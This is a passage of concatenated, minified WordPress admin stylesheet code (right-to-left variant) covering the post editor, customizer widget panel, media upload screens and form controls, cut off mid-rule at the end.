#adminmenuwrap{transition-duration:.6s;transition-property:transform;transition-timing-function:ease-in-out}.focus-on #adminmenuback,.focus-on #adminmenuwrap{transform:translateX(100%)}.focus-off #adminmenuback,.focus-off #adminmenuwrap{transform:translateX(0);transition-duration:.2s;transition-property:transform;transition-timing-function:ease-in-out}@media print,(min-resolution:120dpi){#content-resize-handle,#post-body .wp_themeSkin .mceStatusbar a.mceResize{background:transparent url(../images/resize-2x.gif) no-repeat scroll left bottom;background-size:11px 11px}.rtl #content-resize-handle,.rtl #post-body .wp_themeSkin .mceStatusbar a.mceResize{background-image:url(../images/resize-rtl-2x.gif);background-position:left bottom}}@media only screen and (max-width:1200px){.post-type-attachment #poststuff{min-width:0}.post-type-attachment #wpbody-content #poststuff #post-body{margin:0}.post-type-attachment #wpbody-content #post-body.columns-2 #postbox-container-1{margin-left:0;width:100%}.post-type-attachment #poststuff #postbox-container-1 #side-sortables:empty,.post-type-attachment #poststuff #postbox-container-1 .empty-container{outline:0;height:0;min-height:0}.post-type-attachment #poststuff #post-body.columns-2 #side-sortables{min-height:0;width:auto}.is-dragging-metaboxes.post-type-attachment #post-body .meta-box-sortables{border:none;background:0 0;min-height:0;margin-bottom:0}.post-type-attachment .columns-prefs,.post-type-attachment .screen-layout{display:none}}@media only screen and (max-width:850px){#poststuff{min-width:0}#wpbody-content #poststuff #post-body{margin:0}#wpbody-content #post-body.columns-2 #postbox-container-1{margin-left:0;width:100%}#poststuff #postbox-container-1 #side-sortables:empty,#poststuff #postbox-container-1 .empty-container{height:0;min-height:0}#poststuff #post-body.columns-2 #side-sortables{min-height:0;width:auto}.is-dragging-metaboxes #poststuff #post-body.columns-2 #side-sortables,.is-dragging-metaboxes #poststuff #post-body.columns-2 .meta-box-sortables,.is-dragging-metaboxes #poststuff #postbox-container-1 #side-sortables:empty,.is-dragging-metaboxes #poststuff #postbox-container-1 .empty-container{height:auto;min-height:60px}.columns-prefs,.screen-layout{display:none}}@media screen and (max-width:782px){.wp-core-ui .edit-tag-actions .button-primary{margin-bottom:0}#post-body-content{min-width:0}#titlediv #title-prompt-text{padding:10px}#poststuff .stuffbox .inside{padding:0 0 4px 2px}#poststuff .stuffbox>h3,#poststuff h2,#poststuff h3.hndle{padding:12px}#namediv.stuffbox .editcomment.form-table td{padding:5px 10px}.post-format-options{padding-left:0}.post-format-options a{margin-left:5px;margin-bottom:5px;min-width:52px}.post-format-options .post-format-title{font-size:11px}.post-format-options a div{height:28px;width:28px}.post-format-options a div:before{font-size:26px!important}#post-visibility-select{line-height:280%}.wp-core-ui .save-post-visibility,.wp-core-ui .save-timestamp{vertical-align:middle;margin-left:15px}.timestamp-wrap select#mm{display:block;width:100%;margin-bottom:10px}.timestamp-wrap #aa,.timestamp-wrap #hh,.timestamp-wrap #jj,.timestamp-wrap #mn{padding:12px 3px;font-size:14px;margin-bottom:5px;width:auto;text-align:center}ul.category-tabs{margin:30px 0 15px}ul.category-tabs li.tabs{padding:15px}ul.categorychecklist li{margin-bottom:15px}ul.categorychecklist ul{margin-top:15px}.category-add input[type=text],.category-add select{max-width:none;margin-bottom:15px}.tagsdiv .newtag{flex:1;min-width:0;height:auto;margin-bottom:0}.tagchecklist{margin:25px 10px}.tagchecklist>li{font-size:16px;line-height:1.4}#commentstatusdiv p{line-height:2.8}.mceToolbar *{white-space:normal!important}.mceToolbar td,.mceToolbar tr{float:right!important}.wp_themeSkin a.mceButton{width:30px;height:30px}.wp_themeSkin .mceButton .mceIcon{margin-top:5px;margin-right:5px}.wp_themeSkin .mceSplitButton{margin-top:1px}.wp_themeSkin .mceSplitButton td a.mceAction{padding:6px 6px 6px 3px}.wp_themeSkin .mceSplitButton td a.mceOpen,.wp_themeSkin .mceSplitButtonEnabled:hover td a.mceOpen{padding-top:6px;padding-bottom:6px;background-position:1px 6px}.wp_themeSkin table.mceListBox{margin:5px}div.quicktags-toolbar input{padding:10px 20px}button.wp-switch-editor{font-size:16px;line-height:1;margin:7px 7px 0 0;padding:8px 12px}#wp-content-media-buttons a{font-size:14px;padding:6px 10px}.wp-media-buttons span.jetpack-contact-form-icon,.wp-media-buttons span.wp-media-buttons-icon{width:22px!important;margin-right:-2px!important}.wp-media-buttons #insert-jetpack-contact-form span.jetpack-contact-form-icon:before,.wp-media-buttons .add_media span.wp-media-buttons-icon:before{font-size:20px!important}#content_wp_fullscreen{display:none}.misc-pub-section{padding:12px 10px}#delete-action,#publishing-action{line-height:3.61538461}#publishing-action .spinner{float:none;margin-top:-2px}.comment-ays td,.comment-ays th{padding-bottom:0}.comment-ays td{padding-top:6px}.links-table #link_rel{max-width:none}.links-table td,.links-table th{padding:10px 0}.edit-term-notes{display:none}.privacy-text-box{width:auto}.privacy-text-box-toc{float:none;width:auto;height:100%;display:flex;flex-direction:column}.privacy-text-section .return-to-top{margin:2em 0 0}}/*! This file is auto-generated */ .wp-full-overlay-sidebar{overflow:visible}.control-section.control-section-sidebar,.customize-control-sidebar_widgets .hide-if-js,.customize-control-sidebar_widgets label{display:none}.control-section.control-section-sidebar .accordion-section-content.ui-sortable{overflow:visible}.customize-control-widget_form .widget-top{background:#fff;transition:opacity .5s}.customize-control .widget-action{color:#787c82}.customize-control .widget-action:focus,.customize-control .widget-top:hover .widget-action{color:#1d2327}.customize-control-widget_form:not(.widget-rendered) .widget-top{opacity:.5}.customize-control-widget_form .widget-control-save{display:none}.customize-control-widget_form .spinner{visibility:hidden;margin-top:0}.customize-control-widget_form.previewer-loading .spinner{visibility:visible}.customize-control-widget_form.widget-form-disabled .widget-content{opacity:.7;pointer-events:none;-webkit-user-select:none;user-select:none}.customize-control-widget_form .widget{margin-bottom:0}.customize-control-widget_form.wide-widget-control .widget-inside{position:fixed;right:299px;top:25%;border:1px solid #dcdcde;overflow:auto}.customize-control-widget_form.wide-widget-control .widget-inside>.form{padding:20px}.customize-control-widget_form.wide-widget-control .widget-top{transition:background-color .4s}.customize-control-widget_form.wide-widget-control.expanded:not(.collapsing) .widget-top,.customize-control-widget_form.wide-widget-control.expanding .widget-top{background-color:#dcdcde}.widget-inside{padding:1px 10px 10px;border-top:none;line-height:1.23076923}.customize-control-widget_form.expanded .widget-action .toggle-indicator:before{content:"\f142"}.customize-control-widget_form.wide-widget-control .widget-action .toggle-indicator:before{content:"\f141"}.customize-control-widget_form.wide-widget-control.expanded .widget-action .toggle-indicator:before{content:"\f139"}.widget-title-action{cursor:pointer}.customize-control-widget_form .widget .customize-control-title,.widget-top{cursor:move}.control-section.accordion-section.highlighted>.accordion-section-title,.customize-control-widget_form.highlighted{outline:0;box-shadow:0 0 2px rgba(79,148,212,.8);position:relative;z-index:1}#widget-customizer-control-templates{display:none}#customize-theme-controls .widget-reorder-nav{display:none;float:left;background-color:#f6f7f7}.move-widget:before{content:"\f504";content:"\f504"/''}#customize-theme-controls .move-widget-area{display:none;background:#fff;border:1px solid #c3c4c7;border-top:none;cursor:auto}#customize-theme-controls .reordering .move-widget-area.active{display:block}#customize-theme-controls .move-widget-area .description{margin:0;padding:15px 20px;font-weight:400}#customize-theme-controls .widget-area-select{margin:0;padding:0;list-style:none}#customize-theme-controls .widget-area-select li{position:relative;margin:0;padding:13px 42px 15px 15px;color:#50575e;border-top:1px solid #c3c4c7;cursor:pointer;-webkit-user-select:none;user-select:none}#customize-theme-controls .widget-area-select li:before{display:none;content:"\f147";content:"\f147"/'';position:absolute;top:12px;right:10px;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#customize-theme-controls .widget-area-select li:last-child{border-bottom:1px solid #c3c4c7}#customize-theme-controls .widget-area-select .selected{color:#fff;background:var(--wp-admin-theme-color)}#customize-theme-controls .widget-area-select .selected:before{display:block}#customize-theme-controls .move-widget-actions{text-align:left;padding:12px}#customize-theme-controls .reordering .widget-title-action{display:none}#customize-theme-controls .reordering .widget-reorder-nav{display:block}.wp-customizer div.mce-inline-toolbar-grp,.wp-customizer div.mce-tooltip{z-index:500100!important}.wp-customizer .ui-autocomplete.wplink-autocomplete{z-index:500110}.wp-customizer #wp-link-backdrop{z-index:500100}.wp-customizer #wp-link-wrap{z-index:500105}#widgets-left #available-widgets .widget{float:none!important;width:auto!important}#available-widgets .widget-action{display:none}.ios #available-widgets{transition:right 0s}#available-widgets .widget-tpl.selected,#available-widgets .widget-tpl:hover{background:#f6f7f7;border-bottom-color:#c3c4c7;color:var(--wp-admin-theme-color);border-right:4px solid var(--wp-admin-theme-color)}#customize-controls .widget-title h3{font-size:1em}#available-widgets .widget-title h3{padding:0 0 5px;font-size:14px}#available-widgets .widget .widget-description{padding:0;color:#646970}@media (prefers-reduced-motion:no-preference){#customize-preview{transition:all .2s}}body.adding-widget #available-widgets{right:0;visibility:visible}body.adding-widget .wp-full-overlay-main{right:300px}body.adding-widget #customize-preview{opacity:.4}#available-widgets .widget-title{position:relative}#available-widgets .widget-title:before{content:"\f132";content:"\f132"/'';position:absolute;top:-3px;left:100%;margin-left:20px;width:20px;height:20px;color:#2c3338;font:normal 20px/1 dashicons;text-align:center;box-sizing:border-box;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#available-widgets [class*=easy] .widget-title:before{content:"\f328";content:"\f328"/'';top:-4px}#available-widgets [class*=like] .widget-title:before,#available-widgets [class*=super] .widget-title:before{content:"\f155";content:"\f155"/'';top:-4px}#available-widgets [class*=meta] .widget-title:before{content:"\f120";content:"\f120"/''}#available-widgets [class*=archives] .widget-title:before{content:"\f480";content:"\f480"/'';top:-4px}#available-widgets [class*=categor] .widget-title:before{content:"\f318";content:"\f318"/'';top:-4px}#available-widgets [class*=chat] .widget-title:before,#available-widgets [class*=comment] .widget-title:before,#available-widgets [class*=testimonial] .widget-title:before{content:"\f101";content:"\f101"/''}#available-widgets [class*=post] .widget-title:before{content:"\f109";content:"\f109"/''}#available-widgets [class*=page] .widget-title:before{content:"\f105";content:"\f105"/''}#available-widgets [class*=text] .widget-title:before{content:"\f478";content:"\f478"/''}#available-widgets [class*=link] .widget-title:before{content:"\f103";content:"\f103"/''}#available-widgets [class*=search] .widget-title:before{content:"\f179";content:"\f179"/''}#available-widgets [class*=menu] .widget-title:before,#available-widgets [class*=nav] .widget-title:before{content:"\f333";content:"\f333"/''}#available-widgets [class*=tag] .widget-title:before{content:"\f479";content:"\f479"/''}#available-widgets [class*=rss] .widget-title:before{content:"\f303";content:"\f303"/'';top:-6px}#available-widgets [class*=calendar] .widget-title:before,#available-widgets [class*=event] .widget-title:before{content:"\f145";content:"\f145"/'';top:-4px}#available-widgets [class*=image] .widget-title:before,#available-widgets [class*=instagram] .widget-title:before,#available-widgets [class*=photo] .widget-title:before,#available-widgets [class*=slide] .widget-title:before{content:"\f128";content:"\f128"/''}#available-widgets [class*=album] .widget-title:before,#available-widgets [class*=galler] .widget-title:before{content:"\f161";content:"\f161"/''}#available-widgets [class*=tube] .widget-title:before,#available-widgets [class*=video] .widget-title:before{content:"\f126";content:"\f126"/''}#available-widgets [class*=audio] .widget-title:before,#available-widgets [class*=music] .widget-title:before,#available-widgets [class*=radio] .widget-title:before{content:"\f127";content:"\f127"/''}#available-widgets [class*=avatar] .widget-title:before,#available-widgets [class*=grofile] .widget-title:before,#available-widgets [class*=login] .widget-title:before,#available-widgets [class*=member] .widget-title:before,#available-widgets [class*=profile] .widget-title:before,#available-widgets [class*=subscriber] .widget-title:before,#available-widgets [class*=user] .widget-title:before{content:"\f110";content:"\f110"/''}#available-widgets [class*=cart] .widget-title:before,#available-widgets [class*=commerce] .widget-title:before,#available-widgets [class*=shop] .widget-title:before{content:"\f174";content:"\f174"/'';top:-4px}#available-widgets [class*=firewall] .widget-title:before,#available-widgets [class*=secur] .widget-title:before{content:"\f332";content:"\f332"/''}#available-widgets [class*=analytic] .widget-title:before,#available-widgets [class*=poll] .widget-title:before,#available-widgets [class*=stat] .widget-title:before{content:"\f185";content:"\f185"/''}#available-widgets [class*=form] .widget-title:before{content:"\f175";content:"\f175"/''}#available-widgets [class*=contact] .widget-title:before,#available-widgets [class*=mail] .widget-title:before,#available-widgets [class*=news] .widget-title:before,#available-widgets [class*=subscribe] .widget-title:before{content:"\f466";content:"\f466"/''}#available-widgets [class*=share] .widget-title:before,#available-widgets [class*=socia] .widget-title:before{content:"\f237";content:"\f237"/''}#available-widgets [class*=lang] .widget-title:before,#available-widgets [class*=translat] .widget-title:before{content:"\f326";content:"\f326"/''}#available-widgets [class*=locat] .widget-title:before,#available-widgets [class*=map] .widget-title:before{content:"\f231";content:"\f231"/''}#available-widgets [class*=download] .widget-title:before{content:"\f316";content:"\f316"/''}#available-widgets [class*=weather] .widget-title:before{content:"\f176";content:"\f176"/'';top:-4px}#available-widgets [class*=facebook] .widget-title:before{content:"\f304";content:"\f304"/''}#available-widgets [class*=tweet] .widget-title:before,#available-widgets [class*=twitter] .widget-title:before{content:"\f301";content:"\f301"/''}@media screen and (max-height:700px) and (min-width:981px){.customize-control-widget_form{margin-bottom:0}.widget-top{box-shadow:none;margin-top:-1px}.widget-top:hover{position:relative;z-index:1}.last-widget{margin-bottom:15px}.widget-title h3{padding:13px 15px}.widget-top .widget-action{padding:8px 10px}.widget-reorder-nav span{height:39px}.widget-reorder-nav span:before{line-height:39px}#customize-theme-controls .widget-area-select li{padding:9px 42px 11px 15px}#customize-theme-controls .widget-area-select li:before{top:8px}}/*! This file is auto-generated */ div#media-upload-header{margin:0;padding:5px 5px 0;font-weight:600;position:relative;border-bottom:1px solid #dcdcde;background:#f6f7f7}#sidemenu{overflow:hidden;float:none;position:relative;right:0;bottom:-1px;margin:0 5px;padding-right:10px;list-style:none;font-size:12px;font-weight:400}#sidemenu a{padding:0 7px;display:block;float:right;line-height:28px;border-top:1px solid #f6f7f7;border-bottom:1px solid #dcdcde;background-color:#f6f7f7;text-decoration:none;transition:none}#sidemenu li{display:inline;line-height:200%;list-style:none;text-align:center;white-space:nowrap;margin:0;padding:0}#sidemenu a.current{font-weight:400;padding-right:6px;padding-left:6px;border:1px solid #dcdcde;border-bottom-color:#f0f0f1;background-color:#f0f0f1;color:#000}#media-upload:after{content:"";display:table;clear:both}#media-upload .slidetoggle{border-top-color:#dcdcde}#media-upload input[type=radio]{padding:0}.media-upload-form label.form-help,td.help{color:#646970}form{margin:1em}#search-filter{text-align:left}th{position:relative}.media-upload-form label.form-help,td.help{font-family:sans-serif;font-style:italic;font-weight:400}.media-upload-form p.help{margin:0;padding:0}.media-upload-form fieldset{width:100%;border:none;text-align:justify;margin:0 0 1em;padding:0}.image-align-none-label{background:url(../images/align-none.png) no-repeat center right}.image-align-left-label{background:url(../images/align-left.png) no-repeat center right}.image-align-center-label{background:url(../images/align-center.png) no-repeat center right}.image-align-right-label{background:url(../images/align-right.png) no-repeat center right}tr.image-size td{width:460px}tr.image-size div.image-size-item{margin:0 0 5px}#gallery-form .progress,#library-form .progress,.describe.startclosed,.describe.startopen,.insert-gallery{display:none}.media-item .thumbnail{max-width:128px;max-height:128px}thead.media-item-info tr{background-color:transparent}.form-table thead.media-item-info{border:8px solid #fff}abbr.required,span.required{text-decoration:none;border:none}.describe label{display:inline}.describe td.error{padding:2px 8px}.describe td.A1{width:132px}.describe input[type=text],.describe textarea{width:460px;border-width:1px;border-style:solid}#media-upload p.ml-submit{padding:1em 0}#media-upload label.help,#media-upload p.help{font-family:sans-serif;font-style:italic;font-weight:400}#media-upload .ui-sortable .media-item{cursor:move}#media-upload tr.image-size{margin-bottom:1em;height:3em}#media-upload #filter{width:623px}#media-upload #filter .subsubsub{margin:8px 0}#media-upload .tablenav-pages .current,#media-upload .tablenav-pages a{display:inline-block;padding:4px 5px 6px;font-size:16px;line-height:1;text-align:center;text-decoration:none}#media-upload .tablenav-pages a{min-width:17px;border:1px solid #c3c4c7;background:#f6f7f7}#filter .tablenav select{border-style:solid;border-width:1px;padding:2px;vertical-align:top;width:auto}#media-upload .del-attachment{display:none;margin:5px 0}.menu_order{float:left;font-size:11px;margin:8px 10px 0}.menu_order_input{border:1px solid #dcdcde;font-size:10px;padding:1px;width:23px}.ui-sortable-helper{background-color:#fff;border:1px solid #a7aaad;opacity:.6}#media-upload th.order-head{width:20%;text-align:center}#media-upload th.actions-head{width:25%;text-align:center}#media-upload a.wp-post-thumbnail{margin:0 20px}#media-upload .widefat{border-style:solid solid none}.sorthelper{height:37px;width:623px;display:block}#gallery-settings th.label{width:160px}#gallery-settings #basic th.label{padding:5px 0 5px 5px}#gallery-settings .title{clear:both;padding:0 0 3px;font-size:1.6em;border-bottom:1px solid #dcdcde}h3.media-title{font-size:1.6em}h4.media-sub-title{border-bottom:1px solid #dcdcde;font-size:1.3em;margin:12px;padding:0 0 3px}#gallery-settings .title,h3.media-title,h4.media-sub-title{font-family:Georgia,"Times New Roman",Times,serif;font-weight:400;color:#50575e}#gallery-settings .describe td{vertical-align:middle;height:3em}#gallery-settings .describe th.label{padding-top:.5em;text-align:right}#gallery-settings .describe{padding:5px;width:100%;clear:both;cursor:default;background:#fff}#gallery-settings .describe select{width:15em}#gallery-settings .describe select option,#gallery-settings .describe td{padding:0}#gallery-settings label,#gallery-settings legend{font-size:13px;color:#3c434a;margin-left:15px}#gallery-settings .align .field label{margin:0 3px 0 1em}#gallery-settings p.ml-submit{border-top:1px solid #dcdcde}#gallery-settings select#columns{width:6em}#sort-buttons{font-size:.8em;margin:3px 0 -8px 25px;text-align:left;max-width:625px}#sort-buttons a{text-decoration:none}#sort-buttons #asc,#sort-buttons #showall{padding-right:5px}#sort-buttons span{margin-left:25px}p.media-types{margin:0;padding:1em}p.media-types-required-info{padding-top:0}tr.not-image{display:none}table.not-image tr.not-image{display:table-row}table.not-image tr.image-only{display:none}@media print,(min-resolution:120dpi){.image-align-none-label{background-image:url(../images/align-none-2x.png?ver=20120916);background-size:21px 15px}.image-align-left-label{background-image:url(../images/align-left-2x.png?ver=20120916);background-size:22px 15px}.image-align-center-label{background-image:url(../images/align-center-2x.png?ver=20120916);background-size:21px 15px}.image-align-right-label{background-image:url(../images/align-right-2x.png?ver=20120916);background-size:22px 15px}}/*! This file is auto-generated */ button,input,select,textarea{box-sizing:border-box;font-family:inherit;font-size:inherit;font-weight:inherit}input,textarea{font-size:14px}textarea{overflow:auto;padding:8px 12px;line-height:1.42857143;resize:vertical}input,select{margin:0 1px}textarea.code{padding:8px 12px}input[type=color],input[type=date],input[type=datetime-local],input[type=datetime],input[type=email],input[type=month],input[type=number],input[type=password],input[type=search],input[type=tel],input[type=text],input[type=time],input[type=url],input[type=week],select,textarea{box-shadow:0 0 0 transparent;border-radius:2px;border:1px solid #949494;background-color:#fff;color:#1e1e1e}input[type=date],input[type=datetime-local],input[type=datetime],input[type=email],input[type=month],input[type=number],input[type=password],input[type=search],input[type=tel],input[type=text],input[type=time],input[type=url],input[type=week]{padding:0 12px;min-height:40px}select{padding:0 24px 0 12px;line-height:2.71428571;min-height:40px}::-webkit-datetime-edit{line-height:1.85714286}input[type=color]:focus,input[type=date]:focus,input[type=datetime-local]:focus,input[type=datetime]:focus,input[type=email]:focus,input[type=month]:focus,input[type=number]:focus,input[type=password]:focus,input[type=search]:focus,input[type=tel]:focus,input[type=text]:focus,input[type=time]:focus,input[type=url]:focus,input[type=week]:focus,select:focus,textarea:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:2px solid transparent}input[type=checkbox]:focus,input[type=radio]:focus{border-color:#1e1e1e;box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid transparent}.ltr,input[type=email],input[type=password],input[type=url]{direction:ltr}input[type=checkbox],input[type=radio]{border:1px solid #1e1e1e;border-radius:2px;background:#fff;color:#1e1e1e;clear:none;cursor:pointer;display:inline-block;line-height:0;height:1rem;margin:-.25rem .25rem 0 0;outline:0;padding:0!important;text-align:center;vertical-align:middle;width:1rem;min-width:1rem;-webkit-appearance:none;box-shadow:none;transition:.05s border-color ease-in-out}input[type=radio]:checked+label:before{color:#949494}.wp-core-ui input[type=reset]:active,.wp-core-ui input[type=reset]:hover{color:#135e96}.wp-admin p input[type=checkbox],.wp-admin p input[type=radio],td>input[type=checkbox]{margin-top:0}.wp-admin p label input[type=checkbox]{margin-top:-4px}.wp-admin p label input[type=radio]{margin-top:-2px}input[type=radio]{display:inline-flex;border-radius:50%;margin-right:.25rem;align-items:center;justify-content:center}input[type=checkbox]:checked::before,input[type=radio]:checked::before{float:left;display:inline-block;vertical-align:middle;width:1rem;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}input[type=checkbox]:checked::before{content:url("data:image/svg+xml;utf8,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20viewBox%3D%270%200%2020%2020%27%3E%3Cpath%20d%3D%27M14.83%204.89l1.34.94-5.81%208.38H9.02L5.78%209.67l1.34-1.25%202.57%202.4z%27%20fill%3D%27%23ffffff%27%2F%3E%3C%2Fsvg%3E");content:url("data:image/svg+xml;utf8,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20viewBox%3D%270%200%2020%2020%27%3E%3Cpath%20d%3D%27M14.83%204.89l1.34.94-5.81%208.38H9.02L5.78%209.67l1.34-1.25%202.57%202.4z%27%20fill%3D%27%23ffffff%27%2F%3E%3C%2Fsvg%3E")/'';margin:-.1875rem 0 0 -.25rem;height:1.3125rem;width:1.3125rem}input[type=checkbox]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}input[type=radio]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}input[type=radio]:checked::before{content:"";border-radius:50%;width:.5rem;height:.5rem;margin:auto;background-color:#fff;outline:4px solid transparent}@-moz-document url-prefix(){.form-table input.tog,input[type=checkbox],input[type=radio]{margin-bottom:-1px}}input[type=search]{-webkit-appearance:textfield}input[type=search]::-webkit-search-decoration{display:none}input[type=search]::-webkit-search-cancel-button{cursor:pointer}.wp-admin input[type=file]{padding:3px 0;cursor:pointer}input.readonly,input[readonly],textarea.readonly,textarea[readonly]{background-color:#f0f0f0}::-webkit-input-placeholder{color:#757575}::-moz-placeholder{color:#757575}.form-invalid .form-required,.form-invalid .form-required:focus,.form-invalid.form-required input,.form-invalid.form-required input:focus,.form-invalid.form-required select,.form-invalid.form-required select:focus{border-color:#d63638!important;box-shadow:0 0 2px rgba(214,54,56,.8)}.form-table .form-required.form-invalid td:after{content:"\f534";content:"\f534"/'';font:normal 20px/1 dashicons;color:#d63638;margin-left:-25px;vertical-align:middle}.form-table .form-required.user-pass1-wrap.form-invalid td:after{content:""}.form-table .form-required.user-pass1-wrap.form-invalid .password-input-wrapper:after{content:"\f534";content:"\f534"/'';font:normal 20px/1 dashicons;color:#d63638;margin:0 6px 0 -29px;vertical-align:middle}.form-input-tip{color:#646970}input.disabled,input:disabled,select.disabled,select:disabled,textarea.disabled,textarea:disabled{background:#f0f0f0;border-color:#ccc;box-shadow:none;color:#949494}input[type=file].disabled,input[type=file]:disabled,input[type=file][aria-disabled=true],input[type=range].disabled,input[type=range]:disabled,input[type=range][aria-disabled=true]{background:0 0;box-shadow:none;cursor:default}input[type=checkbox].disabled,input[type=checkbox].disabled:checked:before,input[type=checkbox]:disabled,input[type=checkbox]:disabled:checked:before,input[type=checkbox][aria-disabled=true],input[type=radio].disabled,input[type=radio].disabled:checked:before,input[type=radio]:disabled,input[type=radio]:disabled:checked:before,input[type=radio][aria-disabled=true]{opacity:.7;cursor:default}.wp-core-ui select{font-size:14px;line-height:2.71428571;color:#1e1e1e;border-color:#949494;box-shadow:none;border-radius:2px;padding:0 24px 0 12px;min-height:40px;max-width:25rem;-webkit-appearance:none;background:#fff url('data:image/svg+xml;charset=US-ASCII,%3Csvg%20width%3D%2220%22%20height%3D%2220%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d%3D%22M5%206l5%205%205-5%202%201-7%207-7-7%202-1z%22%20fill%3D%22%231e1e1e%22%2F%3E%3C%2Fsvg%3E') no-repeat right 8px top 55%;background-size:16px 16px;cursor:pointer;vertical-align:middle}.wp-core-ui select:hover{color:#1e1e1e;border-color:#1e1e1e}.wp-core-ui select:focus{border-color:var(--wp-admin-theme-color);color:#1e1e1e;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-core-ui select:active{border-color:#949494;box-shadow:none}.wp-core-ui select.disabled,.wp-core-ui select:disabled{color:#a7aaad;border-color:#dcdcde;background-color:#f6f7f7;background-image:url('data:image/svg+xml;charset=US-ASCII,%3Csvg%20width%3D%2220%22%20height%3D%2220%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d%3D%22M5%206l5%205%205-5%202%201-7%207-7-7%202-1z%22%20fill%3D%22%23a0a5aa%22%2F%3E%3C%2Fsvg%3E');box-shadow:none;text-shadow:0 1px 0 #fff;cursor:default;transform:none}.wp-core-ui select[aria-disabled=true]{cursor:default}.wp-core-ui select:-moz-focusring{color:transparent;text-shadow:0 0 0 #0a4b78}.wp-core-ui select::-ms-value{background:0 0;color:#50575e}.wp-core-ui select:hover::-ms-value{color:#1e1e1e}.wp-core-ui select:focus::-ms-value{color:#0a4b78}.wp-core-ui select.disabled::-ms-value,.wp-core-ui select:disabled::-ms-value{color:#a7aaad}.wp-core-ui select::-ms-expand{display:none}.wp-admin .button-cancel{display:inline-block;min-height:28px;padding:0 5px;line-height:2}.meta-box-sortables select{max-width:100%}.meta-box-sortables input{vertical-align:middle}.misc-pub-post-status select{margin-top:0}.wp-core-ui select[multiple]{height:auto;padding-right:8px;background:#fff}.submit{padding:1.5em 0;margin:5px 0;border-bottom-left-radius:3px;border-bottom-right-radius:3px;border:none}form p.submit a.cancel:hover{text-decoration:none}p.submit{text-align:left;max-width:100%;margin-top:20px;padding-top:10px}.textright p.submit{border:none;text-align:right}table.form-table+input+input+p.submit,table.form-table+input+p.submit,table.form-table+p.submit{border-top:none;padding-top:0}#major-publishing-actions input,#minor-publishing-actions .preview,#minor-publishing-actions input{text-align:center}input.all-options,textarea.all-options{width:250px}input.large-text,textarea.large-text{width:99%}.regular-text{width:25em}input.small-text{width:50px;padding:0 8px}label input.small-text{margin-top:-4px}input[type=number].small-text{width:65px;padding-right:4px}input.tiny-text{width:35px}input[type=number].tiny-text{width:45px;padding-right:0}#doaction,#doaction2,#post-query-submit{margin:0 8px 0 0}.no-js input#changeit2,.no-js input#doaction2,.no-js label[for=bulk-action-selector-bottom],.no-js label[for=new_role2],.no-js select#bulk-action-selector-bottom,.no-js select#new_role2{display:none}.wp-core-ui .tablenav input[type=date],.wp-core-ui .tablenav input[type=datetime-local],.wp-core-ui .tablenav input[type=datetime],.wp-core-ui .tablenav input[type=email],.wp-core-ui .tablenav input[type=month],.wp-core-ui .tablenav input[type=number],.wp-core-ui .tablenav input[type=password],.wp-core-ui .tablenav input[type=search],.wp-core-ui .tablenav input[type=tel],.wp-core-ui .tablenav input[type=text],.wp-core-ui .tablenav input[type=time],.wp-core-ui .tablenav input[type=url],.wp-core-ui .tablenav input[type=week],.wp-core-ui .tablenav select{padding:0 12px;line-height:2.14285714;min-height:32px}.wp-core-ui .tablenav select{float:left;margin-right:6px;max-width:12.5rem;padding:0 24px 0 8px}.wp-core-ui .tablenav .button{min-height:32px;line-height:2.30769231;padding:0 12px}#timezone_string option{margin-left:1em}.wp-core-ui .button.wp-cancel-pw>.dashicons,.wp-core-ui .button.wp-hide-pw>.dashicons{width:1.25rem;height:1.25rem;font-size:20px;line-height:1;vertical-align:middle}.button.wp-hide-pw.user-new-password-toggle{display:inline-flex;align-items:center;column-gap:4px}.wp-cancel-pw .dashicons-no{display:none}#your-profile label+a,label{vertical-align:middle}#your-profile label+a,fieldset label{vertical-align:middle}.options-media-php [for*="_size_"]{min-width:10em;vertical-align:baseline}.options-media-php .small-text[name*="_size_"]{margin:0 0 1em}.wp-generate-pw{margin-top:1em;position:relative}.wp-pwd button{height:min-content}.wp-pwd{margin-top:1em;position:relative}.mailserver-pass-wrap .wp-pwd{display:inline-block;margin-top:0}#mailserver_pass{padding-right:2.5rem}.mailserver-pass-wrap .button.wp-hide-pw{background:0 0;border:1px solid transparent;box-shadow:none;font-size:14px;line-height:2;width:2.5rem;min-width:40px;margin:0;padding:0 9px;position:absolute;right:0;top:0}.mailserver-pass-wrap .button.wp-hide-pw:hover{background:0 0;border-color:transparent}.mailserver-pass-wrap .button.wp-hide-pw:focus{background:0 0;border-color:var(--wp-admin-theme-color);border-radius:2px;box-shadow:0 0 0 .5px var(--wp-admin-theme-color);outline:2px solid transparent}.mailserver-pass-wrap .button.wp-hide-pw:active{background:0 0;box-shadow:none;transform:none}#misc-publishing-actions label{vertical-align:baseline}#pass-strength-result{background-color:#f0f0f0;border:1px solid #ccc;border-radius:2px;color:#1e1e1e;margin:-1px 1px 5px;padding:3px 5px;text-align:center;width:25em;box-sizing:border-box;opacity:0}#pass-strength-result.short{background-color:#ffabaf;border-color:#e65054;opacity:1}#pass-strength-result.bad{background-color:#facfd2;border-color:#f86368;opacity:1}#pass-strength-result.good{background-color:#f5e6ab;border-color:#f0c33c;opacity:1}#pass-strength-result.strong{background-color:#b8e6bf;border-color:#68de7c;opacity:1}.password-input-wrapper{display:inline-block}.password-input-wrapper 